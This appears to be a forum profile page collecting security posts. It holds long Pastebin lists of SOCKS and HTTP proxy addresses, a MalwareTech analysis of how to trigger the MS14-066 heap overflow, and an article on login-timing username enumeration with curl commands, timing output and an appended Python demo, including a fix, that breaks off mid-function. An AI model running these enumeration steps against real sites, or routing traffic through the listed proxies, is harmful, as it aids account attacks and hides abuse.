Everything posted by Nytro
-
[h=1]22-11-14 | VIP Socks 5 (62)[/h]
Checked & filtered
1.123.173.67:19065
104.11.133.164:44049
104.139.100.123:42420
104.4.83.73:36221
107.9.49.108:51259
108.24.82.162:35365
109.154.200.72:15052
173.21.14.244:16191
173.245.239.242:59477
173.48.85.6:46660
174.107.164.196:26849
174.116.239.240:35630
176.63.119.172:40136
184.155.143.249:42637
184.68.38.126:50901
198.27.67.24:53050
198.27.67.24:53193
198.50.206.1:443
199.182.225.70:25512
203.110.141.106:52511
203.45.178.175:49437
216.240.53.99:43800
217.66.27.149:7011
23.255.237.44:27588
24.144.145.125:44998
24.154.218.133:33290
24.168.43.58:36072
24.2.214.169:54442
24.229.64.217:5279
24.45.4.130:16063
24.7.95.31:30803
24.93.123.61:2699
31.15.217.3:33078
37.159.220.241:46767
37.57.97.96:24083
61.147.67.2:9125
64.18.119.226:20159
64.229.172.61:19873
66.112.33.144:45581
66.250.241.36:5112
67.58.83.247:39264
69.147.252.172:443
69.76.173.69:30631
70.173.40.165:19102
70.175.230.124:47067
70.184.92.175:25837
71.74.145.212:48814
74.101.164.248:19337
74.194.2.93:15782
74.84.255.109:32936
76.12.56.108:1028
76.180.122.136:29744
78.39.178.2:443
85.222.111.125:22167
90.200.112.137:25859
91.246.235.157:16122
92.245.196.43:5165
96.241.56.92:52074
96.36.39.162:17632
98.193.56.63:28778
98.222.86.109:42368
98.243.193.64:46547
Source: 22-11-14 | VIP Socks 5 (62) - Pastebin.com
-
22-11-14 | L1 High Anonymous Proxies (940) 22-11-14 | L1 High Anonymous Proxies (940) Checked & filtered 123.110.82.126:8088 117.147.246.90:8123 112.18.164.85:8123 182.93.236.22:8080 183.228.197.222:8123 202.114.6.37:9001 180.213.2.154:1337 112.111.114.51:9000 182.234.146.247:8088 111.10.88.235:8123 112.18.186.108:8123 218.207.28.154:8123 119.142.80.95:8585 117.173.18.95:8123 183.222.73.19:8123 111.10.155.212:8123 183.222.182.184:8123 117.176.2.125:8123 223.64.100.118:8123 183.220.198.198:8123 117.175.116.33:8123 223.18.236.163:8088 183.220.235.66:8123 183.228.196.126:8123 183.228.100.129:8123 183.249.20.60:8123 117.174.200.212:8123 183.221.186.212:8123 223.86.208.179:8123 203.172.213.246:8080 130.79.89.237:21320 111.10.101.22:8123 219.68.213.84:8088 183.220.239.167:8123 60.207.63.123:8118 117.176.191.15:8123 112.1.165.17:8123 203.172.222.230:8080 223.86.65.83:8123 1.192.62.103:8585 113.255.41.74:8088 111.9.87.226:8123 183.222.156.80:8123 111.1.3.38:8000 117.175.117.48:8123 183.223.201.147:8123 183.249.52.152:8123 117.139.35.74:8123 111.10.94.186:8123 182.235.37.111:8088 223.85.98.64:8123 183.222.152.160:8123 121.14.138.56:81 223.85.16.92:8123 183.222.172.117:8123 183.223.32.186:8123 219.239.236.49:9999 117.177.44.226:8123 223.85.18.54:8123 123.192.178.150:8088 115.28.85.240:8088 183.222.156.76:8123 117.176.188.152:8123 1.175.48.82:8088 117.173.20.43:8123 120.199.246.0:8123 203.172.209.246:8080 183.222.154.60:8123 223.86.100.43:8123 112.18.92.75:8123 183.223.168.236:8123 117.176.189.40:8123 221.225.117.192:8088 117.176.27.184:8123 1.198.227.78:9000 223.86.14.241:8123 223.86.221.25:8123 222.166.102.139:8088 183.228.36.236:8123 111.10.145.19:8123 223.64.54.95:8123 111.10.130.249:8123 221.178.21.163:8123 117.173.22.10:8123 183.222.157.209:8123 223.86.203.43:8123 223.86.135.250:8123 114.255.183.163:8080 221.178.117.213:8123 223.86.137.155:8123 183.221.217.249:8123 223.85.23.91:8123 203.172.242.190:8080 117.27.157.111:8081 59.148.110.23:8088 117.175.111.110:8123 
49.158.118.219:8088 111.10.145.165:8123 183.228.39.207:8123 183.228.238.106:8123 111.10.103.63:8123 119.246.32.164:8088 223.85.81.183:8123 183.222.152.205:8123 111.10.146.230:8123 183.223.169.195:8123 61.15.192.245:8088 223.87.75.190:8123 140.116.91.199:8088 203.172.227.45:8080 221.178.31.243:8123 111.13.55.3:22 183.221.217.130:8123 221.178.23.42:8123 61.191.27.118:1818 116.228.80.186:8080 123.101.201.123:9000 183.228.111.122:8123 59.162.204.150:8080 203.172.203.6:8080 119.80.183.2:8080 114.27.130.117:8088 117.175.101.134:8088 117.174.193.162:8123 183.228.249.182:8123 62.117.58.109:6588 112.18.166.102:8123 85.234.20.131:3128 94.232.9.242:8080 117.175.227.55:8123 183.228.41.136:8123 223.86.223.222:8123 117.175.215.199:8123 183.228.239.56:8123 183.220.244.101:8123 183.228.43.226:8123 183.219.14.137:8123 117.173.22.98:8123 183.223.157.204:8123 211.139.80.180:8080 221.10.40.237:82 122.88.143.151:8123 183.220.154.216:8123 117.176.38.48:8123 115.28.229.8:8088 111.10.131.7:8123 203.172.211.182:8080 223.85.16.104:8123 61.93.246.50:8080 220.132.129.3:8088 117.173.23.22:8123 112.18.0.101:8123 117.173.23.46:8123 183.228.89.217:8123 218.23.185.19:8080 212.42.116.148:8080 112.18.167.177:8123 123.101.201.116:9000 183.222.154.93:8123 117.175.242.116:8123 221.178.22.165:8123 223.86.65.218:8123 140.115.202.134:8088 223.86.219.3:8123 183.220.46.236:8123 111.10.191.68:8123 112.18.196.247:8123 183.228.122.229:8123 117.177.172.176:8123 117.175.118.97:8123 223.86.4.41:8123 117.175.241.120:8123 112.22.8.174:8123 182.234.152.129:8088 183.222.64.143:8123 221.178.25.156:8123 223.86.221.65:8123 111.10.166.154:8123 61.185.32.21:63000 111.10.97.200:8123 182.93.224.14:8080 117.175.241.98:8123 111.10.39.65:8123 111.9.233.17:8123 183.223.35.39:8123 203.172.211.70:8080 112.18.176.217:8123 183.223.242.172:8123 223.86.216.45:8123 112.21.232.176:8123 112.15.99.191:8123 183.228.182.157:8123 118.166.124.129:8088 221.178.23.254:8123 223.86.134.250:8123 117.139.35.231:8123 117.174.214.192:8123 
117.176.162.104:8123 115.28.11.165:8888 117.172.77.57:8123 73.152.24.102:80 183.209.236.253:8123 221.178.66.31:8123 183.223.200.142:8123 183.220.245.134:8123 183.224.99.149:8123 183.221.55.66:8123 111.243.68.137:8088 123.110.46.159:8088 183.228.151.130:8123 223.86.101.162:8123 223.85.20.11:8123 183.223.192.172:8123 171.12.1.71:81 111.185.131.85:8088 183.222.74.19:8123 117.175.39.91:8123 183.222.72.156:8123 123.101.201.6:9000 223.64.100.36:8123 223.85.21.65:8123 218.28.74.30:63000 117.139.39.98:8123 183.228.148.62:8123 218.207.11.60:8123 183.223.211.126:8123 123.195.26.231:8088 223.87.77.100:8123 183.222.155.111:8123 221.178.20.8:8123 223.85.97.240:8123 120.199.255.129:8123 223.85.23.64:8123 61.155.169.11:808 183.223.192.125:8123 123.241.50.79:8088 120.199.240.70:8123 183.228.40.127:8123 119.14.58.241:8088 203.171.227.38:8888 117.173.21.221:8123 117.139.29.47:8123 111.9.170.249:8123 112.18.168.179:8123 117.175.192.93:8123 183.222.152.110:8123 223.85.22.98:8123 112.44.234.168:8123 183.223.197.108:8123 123.195.35.100:8088 113.200.220.242:8123 223.87.114.74:8123 60.244.39.225:8088 112.44.230.216:8123 223.86.208.132:8123 114.32.219.221:8088 115.29.249.17:9000 183.222.246.137:8123 61.10.141.128:8088 112.16.78.194:8080 117.176.184.108:8123 183.227.211.79:8123 223.86.223.79:8123 140.206.86.70:8080 183.228.40.108:8123 183.228.141.4:8123 183.223.18.181:8123 221.10.40.238:82 77.70.29.176:81 218.244.138.253:808 221.178.31.130:8123 221.178.77.33:8123 112.18.194.31:8123 117.176.191.199:8123 177.223.228.1:9064 221.178.32.91:8123 140.116.101.93:8088 223.86.3.103:8123 112.18.79.182:8123 111.3.71.108:8123 182.93.241.230:8080 82.146.44.46:8080 117.173.204.147:8123 183.222.82.32:8123 222.220.187.51:8585 223.85.76.105:8123 119.246.126.158:8088 223.86.216.56:8123 183.223.155.74:8123 183.223.32.135:8123 219.153.56.22:8080 203.100.80.81:8080 123.202.145.36:8088 223.86.7.137:8123 117.174.200.120:8123 117.173.232.220:8123 117.176.189.195:8123 203.149.30.82:80 183.223.21.24:8123 
221.178.99.51:8123 117.139.34.33:8123 61.177.137.131:63000 223.85.97.171:8123 186.101.75.82:3128 111.10.119.100:8123 111.10.155.184:8123 223.85.100.160:8123 119.77.134.182:8088 183.136.221.6:3128 210.214.27.200:8080 223.86.102.57:8123 171.12.2.131:81 111.184.187.181:8088 49.158.21.212:8088 117.174.197.214:8123 111.10.44.85:8123 117.173.23.28:8123 69.10.137.139:8000 61.182.94.242:63000 183.223.10.174:8123 183.223.35.4:8123 221.10.102.199:843 218.207.11.52:8123 111.10.137.176:8123 111.10.103.175:8123 183.223.195.179:8123 190.200.17.40:21320 183.220.46.85:8123 182.93.218.30:8080 183.228.37.218:8123 111.10.133.203:8123 14.139.111.91:3128 183.228.201.236:8123 222.22.93.252:8088 183.220.245.83:8123 223.86.67.85:8123 173.201.183.172:8000 203.172.222.214:8080 221.178.98.48:8123 60.206.153.177:8118 183.228.192.141:8123 223.85.60.202:8123 111.10.164.159:8123 223.86.216.106:8123 183.223.13.19:8123 117.139.38.32:8123 121.232.13.61:8088 223.86.41.252:8123 183.223.200.77:8123 183.223.153.210:8123 183.222.153.86:8123 202.79.36.119:8080 183.220.247.200:8123 183.222.82.148:8123 210.27.237.111:8088 183.222.178.224:8123 223.86.75.224:8123 183.228.220.58:8123 111.10.158.182:8123 117.173.121.148:8123 112.44.230.36:8123 202.143.154.102:8080 183.227.253.10:8123 161.6.45.63:21320 117.173.245.203:8123 183.222.255.136:8123 223.86.44.133:8123 117.173.18.109:8123 120.199.243.29:8123 117.176.187.81:8123 218.164.150.7:8088 180.153.32.11:8080 183.223.153.13:8123 183.228.243.72:8123 112.18.176.241:8123 118.169.162.252:8088 114.24.110.5:8088 112.18.170.158:8123 111.10.49.255:8123 183.228.138.61:8123 117.172.151.57:8123 223.86.115.53:8123 218.207.12.119:8123 223.87.113.98:8123 183.228.180.247:8123 111.9.234.123:8123 60.26.60.194:8118 223.85.85.2:8123 117.173.240.220:8123 183.228.183.79:8123 223.86.46.182:8123 183.227.209.52:8123 183.222.73.52:8123 221.178.53.138:8123 120.193.60.135:8123 123.193.221.132:8088 183.220.46.113:8123 183.223.198.195:8123 117.173.62.213:8123 117.173.121.254:8123 
60.195.3.180:8118 223.85.97.96:8123 183.222.182.36:8123 218.207.208.55:8080 183.223.192.189:8123 114.40.89.234:8088 59.67.83.68:8088 223.85.83.113:8123 112.18.153.221:8123 117.173.21.14:8123 183.228.242.201:8123 117.174.195.3:8123 112.0.104.138:8123 112.0.30.84:8123 117.175.229.239:8123 183.223.21.138:8123 223.85.95.34:8123 123.101.200.185:9000 223.87.190.96:8123 117.173.20.19:8123 202.143.160.193:8080 223.85.19.121:8123 112.44.238.80:8123 113.200.220.39:8123 117.139.28.18:8123 117.174.198.230:8123 223.86.127.178:8123 111.10.155.120:8123 183.228.79.166:8123 117.173.121.177:8123 117.174.196.5:8123 223.85.21.195:8123 111.10.149.20:8123 223.86.127.126:8123 117.173.20.60:8123 183.220.45.35:8123 221.178.54.70:8123 183.222.152.142:8123 117.175.103.247:8123 42.62.24.87:8085 111.10.44.133:8123 183.223.166.13:8123 221.178.55.45:8123 112.18.161.100:8123 111.2.241.208:8123 1.193.52.246:8118 183.223.11.116:8123 85.90.222.240:12345 111.4.120.140:8123 223.87.184.97:8123 183.221.147.191:8123 111.10.155.106:8123 123.203.56.220:8088 117.173.205.160:8123 186.94.214.35:3128 91.185.110.162:21320 117.174.208.172:8123 221.178.80.217:8123 111.10.100.155:8123 112.18.160.141:8123 123.163.124.30:9000 114.38.197.137:8088 117.176.105.176:8123 183.222.172.192:8123 115.29.247.115:8888 183.223.40.63:8123 223.87.190.118:8123 188.2.107.92:21320 222.88.236.236:81 223.85.97.8:8123 112.11.48.4:8088 182.234.251.104:8088 221.10.102.203:82 117.172.78.48:8123 183.223.168.89:8123 221.178.30.190:8123 223.85.96.47:8123 182.93.236.6:8080 223.86.99.57:8123 223.86.223.40:8123 125.71.212.25:9000 223.85.98.166:8123 117.63.0.60:8118 218.95.158.99:63000 49.159.14.176:8088 1.194.8.245:808 123.193.199.41:8088 183.228.72.54:8123 60.206.239.195:8118 112.20.116.103:8123 202.103.150.70:8088 58.115.101.4:8088 112.15.33.108:8123 223.64.100.23:8123 114.255.183.173:8080 117.173.20.230:8123 117.173.242.166:8123 123.101.200.209:9000 223.86.216.249:8123 183.220.244.201:8123 118.161.57.99:8088 112.18.176.138:8123 
58.195.5.30:8088 60.191.139.18:9000 183.220.155.167:8123 112.22.252.69:8123 182.93.218.86:8080 183.223.166.223:8123 61.244.4.96:8088 112.3.166.142:8123 111.10.86.249:8123 180.153.32.9:8080 112.22.228.193:8123 223.86.210.46:8123 223.87.114.181:8123 117.175.239.23:8123 112.21.237.134:8123 183.223.20.153:8123 112.18.64.130:8123 223.85.17.108:8123 62.75.229.121:3128 221.178.117.187:8123 223.64.225.78:8123 112.44.245.141:8123 223.86.212.188:8123 183.222.153.130:8123 183.209.110.179:8123 1.170.20.142:8088 221.182.62.30:8123 180.177.194.95:8088 180.102.32.92:8118 111.10.101.185:8123 112.18.92.197:8123 183.222.182.26:8123 223.85.80.160:8123 183.228.246.55:8123 223.85.98.141:8123 183.228.241.174:8123 223.87.190.199:8123 111.10.163.178:8123 117.173.83.111:8123 183.222.155.56:8123 14.136.3.205:8088 218.252.119.131:8088 117.174.201.3:8123 117.173.22.221:8123 112.18.176.26:8123 183.230.53.78:8123 69.64.32.110:12183 183.222.155.175:8123 91.241.18.129:3129 183.228.181.58:8123 112.44.231.164:8123 183.220.247.113:8123 112.111.114.137:9000 112.18.69.249:8123 223.86.221.246:8123 60.166.19.218:63000 111.2.240.145:8123 112.18.194.217:8123 223.85.21.217:8123 112.18.162.147:8123 183.228.89.167:8123 203.172.209.190:8080 117.175.33.9:8123 218.108.168.70:82 106.0.144.6:8080 183.222.158.239:8123 183.222.173.157:8123 111.10.28.146:8123 203.172.216.126:8080 118.122.114.249:9000 183.222.156.225:8123 221.178.75.230:8123 221.182.73.193:8123 183.228.211.133:8123 221.178.31.29:8123 113.164.0.241:8080 183.222.255.183:8123 123.163.120.43:9000 202.77.138.35:8080 111.10.58.82:8123 121.52.229.51:3128 122.88.141.56:8123 202.92.173.189:8088 183.223.166.147:8123 183.228.106.15:8123 111.10.87.91:8123 117.176.184.87:8123 119.14.75.73:8088 112.18.178.43:8123 117.174.192.95:8123 203.172.149.3:8080 123.163.124.29:9000 211.77.5.41:8081 183.245.210.13:8123 117.148.38.134:8123 122.88.169.121:8123 117.139.66.218:8123 223.86.209.94:8123 70.99.146.246:7004 111.10.49.38:8123 111.10.180.195:8123 177.234.12.202:3128 
117.173.20.218:8123 183.208.39.173:8123 112.44.245.149:8123 183.221.160.83:8123 112.18.170.143:8123 183.228.183.225:8123 183.220.196.94:8123 117.173.22.139:8123 117.173.254.168:8123 183.222.252.159:8123 117.176.191.178:8123 111.10.100.182:8123 112.22.16.114:8123 117.175.35.89:8123 111.10.152.37:8123 203.172.216.6:8080 117.148.45.107:8123 211.155.86.245:8000 183.211.27.65:8123 117.173.57.179:8123 183.221.190.172:8123 211.143.146.239:82 213.135.234.6:81 60.210.111.42:8088 111.252.52.91:8088 183.223.159.170:8123 183.220.45.82:8123 59.148.166.55:8088 183.222.154.141:8123 117.173.120.85:8123 117.175.243.51:8123 196.201.216.170:8088 118.161.50.236:8088 117.147.221.157:8123 212.185.87.53:443 223.87.185.201:8123 111.10.119.3:8123 117.139.69.239:8123 183.220.168.42:8123 117.174.198.76:8123 117.174.200.220:8123 123.192.19.227:8088 111.250.170.135:8088 183.227.252.113:8123 218.35.182.54:8088 117.173.22.111:8123 218.207.16.238:8123 183.220.246.125:8123 220.134.40.139:8088 122.88.87.34:8123 58.251.78.71:8088 123.163.120.52:9000 111.39.172.53:8088 218.7.132.1:8080 183.223.172.81:8123 221.178.116.167:8123 111.20.177.46:8123 140.114.226.109:8088 111.10.13.255:8123 140.114.212.169:8088 117.173.102.45:8123 183.223.21.71:8123 183.228.43.155:8123 223.87.184.120:8123 183.228.88.2:8123 117.173.204.186:8123 98.211.196.247:3128 223.85.99.203:8123 117.177.173.119:8123 221.182.62.32:8123 221.178.78.9:8123 223.87.108.92:8123 223.85.23.231:8123 221.182.75.210:8123 222.205.127.250:8080 117.175.194.66:8123 202.143.168.150:8080 112.18.165.152:8123 83.219.21.28:8080 112.3.202.182:8123 39.187.49.24:8123 183.209.236.149:8123 183.221.189.89:8123 140.114.207.85:8088 111.9.110.248:8123 183.222.154.114:8123 183.220.246.223:8123 117.175.118.37:8123 223.64.100.24:8123 183.223.196.201:8123 14.136.61.100:8088 119.97.164.48:8085 203.172.222.38:8080 111.10.100.46:8123 183.223.193.50:8123 117.177.174.142:8123 183.221.160.58:8123 202.105.247.122:9999 111.9.87.119:8123 117.176.109.57:8123 221.178.119.225:8123 
140.114.216.105:8088 112.18.159.243:8123 221.178.86.25:8123 183.222.86.3:8123 218.14.121.227:9000 183.222.172.196:8123 111.10.97.246:8123 117.176.28.70:8123 219.68.160.90:8088 203.71.152.152:8088 210.43.139.105:8088 111.10.194.219:8123 122.88.215.160:8123 159.226.170.79:8080 183.220.196.58:8123 223.86.119.141:8123 203.172.248.198:8080 115.236.59.194:3128 221.178.122.31:8123 1.175.38.181:8088 1.172.25.3:8088 120.199.226.69:8123 117.173.62.226:8123 117.172.77.182:8123 71.230.131.198:3128 183.220.45.65:8123 183.228.78.93:8123 111.9.174.86:8123 182.234.147.27:8088 117.21.192.8:80 111.10.152.34:8123 117.190.76.46:8088 183.223.204.76:8123 112.15.15.158:8123 183.222.172.77:8123 112.111.114.204:9000 223.86.33.71:8123 180.176.131.157:8088 183.228.209.97:8123 109.197.55.7:3128 117.173.21.190:8123 183.228.234.78:8123 223.86.171.178:8123 27.207.69.232:8088 183.208.34.149:8123 140.206.86.68:8080 113.255.46.78:8088 115.43.229.26:8088 117.173.120.232:8123 183.222.152.219:8123 59.124.1.140:8088 119.236.248.42:8088 112.111.114.72:9000 123.203.77.101:8088 112.112.11.82:8080 223.86.4.207:8123 183.222.155.26:8123 221.178.119.207:8123 183.220.46.211:8123 140.116.132.20:8088 221.178.54.183:8123 112.23.249.200:8123 223.64.127.153:8123 124.11.67.64:8088 183.223.168.159:8123 39.189.100.228:8123 183.222.155.149:8123 112.18.161.122:8123 183.220.161.103:8123 222.167.62.122:8088 113.252.202.126:8088 61.187.249.231:63000 183.223.195.106:8123 183.220.46.97:8123 117.148.47.88:8123 183.221.190.222:8123 117.175.103.228:8123 221.178.96.34:8123 123.194.126.60:8088 223.86.6.181:8123 117.175.36.81:8123 221.224.163.37:9000 117.175.109.112:8123 123.163.120.50:9000 183.228.89.229:8123 42.121.105.155:8888 222.45.100.3:8080 223.86.115.154:8123 183.227.218.154:8123 183.221.217.49:8123 117.174.196.202:8123 117.175.242.222:8123 223.18.251.38:8088 221.178.14.227:8123 111.3.109.130:8123 221.10.40.236:81 58.215.212.243:63000 183.223.194.165:8123 223.86.32.119:8123 183.223.213.205:8123 183.223.242.113:8123 
182.93.236.38:8080 111.10.89.189:8123 117.10.244.241:8118 111.10.186.68:8123 125.220.10.125:8088 117.175.213.161:8123 183.228.200.140:8123 211.80.41.192:8088 223.87.76.232:8123 182.93.237.22:8080 111.2.240.170:8123 61.228.25.82:8088 183.222.101.130:8123 183.228.219.244:8123 183.228.242.153:8123 183.221.187.64:8123 117.175.36.150:8123 1.202.15.102:63000 183.245.231.190:8123 218.104.239.12:8118 183.228.193.254:8123 223.86.113.46:8123 221.178.86.204:8123 58.115.139.29:8088 117.139.65.248:8123 212.175.17.237:8080 218.207.53.196:8123 117.175.229.240:8123 123.0.254.83:8088 58.51.197.19:63000 202.115.28.113:808 223.85.98.118:8123 223.87.117.18:8123 111.10.163.97:8123 183.228.181.242:8123 115.154.225.119:8585 183.221.188.121:8123 221.178.83.79:8123 111.184.183.144:8088 112.18.160.251:8123 183.222.173.17:8123 117.175.34.232:8123 111.10.193.29:8123 117.136.166.151:8123 223.86.99.185:8123 118.26.230.75:8080 183.222.158.145:8123 119.6.136.126:82 221.178.20.249:8123 117.173.60.93:8123 118.81.149.200:8088 183.228.72.185:8123 223.86.101.25:8123 223.85.18.23:8123 117.175.124.105:8123 118.194.196.12:8080 116.228.55.217:8003 117.176.1.84:8123 183.222.173.234:8123 223.86.9.193:8123 123.203.96.106:8088 61.57.125.101:8088 117.177.173.131:8123 223.85.99.88:8123 111.10.102.242:8123 221.178.14.231:8123 117.176.162.153:8123 117.173.62.221:8123 112.24.115.214:8123 203.172.233.109:8080 114.43.20.199:8088 203.172.209.49:8080 183.220.46.25:8123 218.35.144.218:8088 119.6.144.70:843 111.10.195.229:8123 182.234.73.217:8088 137.135.166.225:8118 61.155.11.39:9999 219.68.190.87:8088 123.101.194.69:9000 111.10.98.195:8123 183.222.158.92:8123 210.212.245.236:8080 218.207.28.185:8123 111.185.178.5:8088 111.10.138.75:8123 183.228.235.214:8123 202.102.201.99:8080 123.163.120.35:9000 182.93.229.66:8080 182.93.235.118:8080 203.172.149.155:8080 111.10.100.35:8123 211.77.5.38:8081 58.118.216.201:8088 221.178.30.238:8123 223.87.190.26:8123 183.228.103.50:8123 117.175.228.9:8123 124.12.87.119:8088 
183.228.78.4:8123 223.86.217.123:8123 112.44.252.46:8123 218.207.17.82:8123 183.220.228.19:8123 223.85.60.74:8123 183.221.160.243:8123 117.175.116.78:8123 223.85.20.254:8123 80.232.255.197:21320 183.222.159.114:8123 117.173.81.168:8123 111.3.78.103:8123 121.55.204.80:8088 183.228.39.8:8123 183.223.12.202:8123 111.10.194.100:8123 223.86.101.160:8123 117.177.166.246:8123 221.178.65.197:8123 223.85.21.235:8123 5.9.70.75:8118 112.15.64.133:8123 182.118.3.228:8888 223.86.117.33:8123 171.12.2.133:81 183.228.232.72:8123 182.93.218.78:8080 221.178.21.198:8123 58.199.150.21:8585 221.215.150.116:8080 117.149.253.1:8123 183.223.203.141:8123
Source: 22-11-14 | L1 High Anonymous Proxies (940) - Pastebin.com
-
[h=3]MS14-066 In Depth Analysis[/h]

A few days ago I published an article detailing how a second bug, in the schannel TLS handshake handling, could allow an attacker to trigger the DecodeSigAndReverse heap overflow in an application that doesn't support client certificates. I had stated I was not familiar with ECC signatures and was unsure of how to trigger the exploit; however, a few hours' research fixed that. BeyondTrust's post implies they triggered the overflow by randomly modifying the ECC signature, though I believe this is unlikely and was just a safer alternative to disclosing exactly how to trigger the exploit. It was possible for me to achieve remote code execution with either ASLR or DEP disabled, but on a system with both it would prove quite a challenge, thus I'm not too worried about detailing exactly how to trigger the overflow.

[h=2]DecodeSigAndReverse[/h]

We already know the function in which the overflow occurs, so I decided to work backwards from there. This function is responsible for decoding the ASN.1 (DER) encoded ECC signature and returning it to be verified. The first thing that is done here is that the ECC signature is passed to CryptDecodeObject in order to calculate the total size of the decoded signature, which is used to allocate some memory using SPExternalAlloc (a LocalAlloc wrapper). CryptDecodeObject will always handle the signature correctly, with the returned size being sufficient. CryptDecodeObject is now called again, but this time it is passed a pointer to the allocated memory in which to copy the decoded signature. The "cmp ebx, 2Fh" checks the signature type (X509_ECC_SIGNATURE) and will direct the code to the left. The decoded signature is pointed to by an ECC_SIGNATURE header, which is 12 bytes in size and looks something like this. What R and S are doesn't really matter here; all we need to know is that they are extremely large integers. Our ECC structure now contains the size of each integer and a pointer to where it's stored.

The 2 memcpy operations should be pretty obvious now: the first one copies rSize bytes from R to some allocated memory, then the second copies sSize bytes of S to the same memory directly after R. If there's going to be an overflow, it's going to be in the second memcpy. What we don't yet know is the size of the destination memory or how it's allocated. All I had to do to find where the memory gets allocated was to look at the call graph, find the function responsible for calling DecodeSigAndReverse, then scout it for the "Dst" parameter. This is where everything goes right (or wrong if you're Microsoft). _BCryptGetProperty is being passed "KeyLength" to... drum roll please... get the key length. Directly below, that length is being divided by 8 (converted from bits to bytes) then doubled; this is due to the fact the signature length is (should be) double the key length. Just before the call to DecodeSigAndReverse we can see that the destination buffer is also allocated on the heap. So, back at the 2 memcpys, now with knowledge of the destination buffer size, we can see exactly what triggers the heap overflow. If we use a key size of 256 bits (32 bytes), then the function is expecting a 512-bit (64-byte) signature; any more will overflow the heap and, when it's freed, cause a crash. There are very few constraints on the signature, due to the fact the whole thing is just 2 massive integers. As long as we maintain a valid ASN.1 (DER) encoding and the signature is of valid size, we can write arbitrary data to the heap header, resulting in an access violation or even remote code execution when the system tries to free the memory.

Posted by TM at 11:19 AM
Source: MS14-066 In Depth Analysis - MalwareTech
-
Nothing but crap posts. On the next one you get a permanent ban.
-
Timing Attacks in Web Applications

When code is executed by a machine it takes some time to do so. Execution time ranges from nanoseconds to months and years and even more (think bruteforcing). Web applications construct output producing, in most cases, very short delays (think the time it takes to show Google search results after typing in the query). Depending on what output is requested, how it is requested and what the input is, web applications can vary their execution time. In this article we're going to exploit some of the open-source content management systems available, using delays in their execution under differing conditions to evoke distinct differences in execution time, which allow us, as attackers, to make some useful conclusions.

WordPress

You should know what WordPress is. It's only the most popular content management system at the moment, and the slickest one, too. wp-includes/user.php is the code that we shall be attempting to exploit. This code handles user authentication in WordPress. Take your time to go through the function code. You can immediately see early return conditions. When the username is not found, an error is returned. If a username is existent, the password is hashed and checked against the valid password hash for the user. So, hashing the input password is work that does not happen if a username does not exist. And hashing is an expensive operation relative to everything else, so potentially a difference in time should be noticed. Armed with cURL we do:

time curl --data "log=noexist&pwd=asdf&wp-submit=Log In" http://wordpress.lo/wp-login.php --silent > /dev/null
real 0m0.599s
user 0m0.012s
sys 0m0.000s

time curl --data "log=admin&pwd=asdf&wp-submit=Log In" http://wordpress.lo/wp-login.php --silent > /dev/null
real 0m0.566s
user 0m0.000s
sys 0m0.012s

Having done this a couple of times you'll notice no difference. Due to fluctuating network latency and other factors the results are in no way conclusive.

So let's prepare a larger password to hash to make WordPress huff and puff a bit.

echo -n "log=noexist&pwd=" > payload && printf "%s" {1..100000} >> payload && echo -n "&wp-submit=Log In" >> payload

~500 kilos' worth of password characters to hash, eek.

time curl --data @payload http://wordpress.lo/wp-login.php --silent > /dev/null
real 0m0.511s
user 0m0.012s
sys 0m0.032s

echo -n "log=admin&pwd=" > payload && printf "%s" {1..100000} >> payload && echo -n "&wp-submit=Log In" >> payload

time curl --data @payload http://wordpress.lo/wp-login.php --silent > /dev/null
real 0m29.803s
user 0m0.012s
sys 0m0.036s

See? This is, of course, very far from useful in the context of WordPress, since WordPress is kind enough to give out different error messages depending on whether a user exists or not.

ERROR: The password you entered for the username admin is incorrect.
vs.
ERROR: Invalid username.

The same cannot be said for other applications.

Drupal

Authentication in Drupal is handled by the user module, found in modules/user/user.module. Take a peek at the user_login_authenticate_validate function. See the branch that allows some extra work?

if ($account) { ....

The principle is the same. However, short passwords do make Drupal work noticeably enough.

time curl --data "name=noexist&pass=123&op=Log in&form_id=user_login" http://sandbox.lo/drupal-7.12/?q=user --silent > /dev/null
real 0m0.593s
user 0m0.012s
sys 0m0.028s

time curl --data "name=admin&pass=not_real&op=Log in&form_id=user_login" http://sandbox.lo/drupal-7.12/?q=user --silent > /dev/null
real 0m1.181s
user 0m0.012s
sys 0m0.028s

So no need to assemble large payloads. Thanks, Drupal.

Joomla!

The more convoluted Joomla authentication routine is stowed away in plugins/authentication/joomla/joomla.php, onUserAuthenticate. Take a moment to look at it. The scenario is completely the same:

if ($result) { ...

does extra work if the user exists, and

$testcrypt = JUserHelper::getCryptedPassword($credentials['password'], $salt);

will do some work if the user exists, theoretically. The difficulty here is that by default Joomla uses md5 hashing, which is relatively lightweight and very fast. Joomla doesn't really mind hashing 10MB password payloads and is not susceptible to such attacks in md5 mode. Yet, once it's in any of the other available hashing modes, timing attacks to check username validity are possible.

Conclusion

Do you know of any other popular web applications that are predisposed to any form of timing attacks?

Source: Timing Attacks in Web Applications
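The branch shape the article points at, and the attacker's measurement, as an added example that runs offline (this is not code from the article or from WordPress, Drupal or Joomla). `login_leaky` hashes the password only when the username exists, which is the early-return pattern in all three CMS snippets; `login_uniform` is the fix, doing the same hashing work on both branches and comparing against a dummy digest for unknown names. `enumerate_users` is the client side: it times several attempts per candidate and flags names whose median response is several times slower than a name known not to exist. PBKDF2 stands in for the applications' password hashes, and the user table, salt, iteration count and 3x threshold are constructed; over a real network the jitter the article ran into is why medians over repeated trials (or oversized payloads) are needed rather than single requests.

```python
"""Login timing oracle for username enumeration, simulated offline (added example)."""
import hashlib
import hmac
import os
import statistics
import time

ITERATIONS = 50_000                  # constructed: enough that hashing dominates
_SALT = b"constructed-static-salt"   # one salt keeps the model simple


def _hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, ITERATIONS)


USERS = {"admin": _hash("correct horse battery staple")}  # constructed user table
_DUMMY = _hash("")   # compared against when the user is unknown (uniform path)


def login_leaky(username: str, password: str) -> bool:
    """Early return for unknown users: no hashing, so the response is fast."""
    stored = USERS.get(username)
    if stored is None:
        return False
    return hmac.compare_digest(_hash(password), stored)


def login_uniform(username: str, password: str) -> bool:
    """Same work on both branches; existence only affects the final verdict."""
    stored = USERS.get(username)
    match = hmac.compare_digest(_hash(password), stored if stored is not None else _DUMMY)
    return match and stored is not None


def median_login_time(login, username: str, trials: int) -> float:
    """Median of `trials` wall-clock timings of a failed login for `username`."""
    samples = []
    for _ in range(trials):
        t0 = time.perf_counter()
        login(username, "definitely-wrong-password")
        samples.append(time.perf_counter() - t0)
    return statistics.median(samples)   # median resists a stray slow sample


def enumerate_users(login, candidates, trials: int = 7, ratio: float = 3.0) -> set:
    """Return the candidates whose median login time is `ratio` times the
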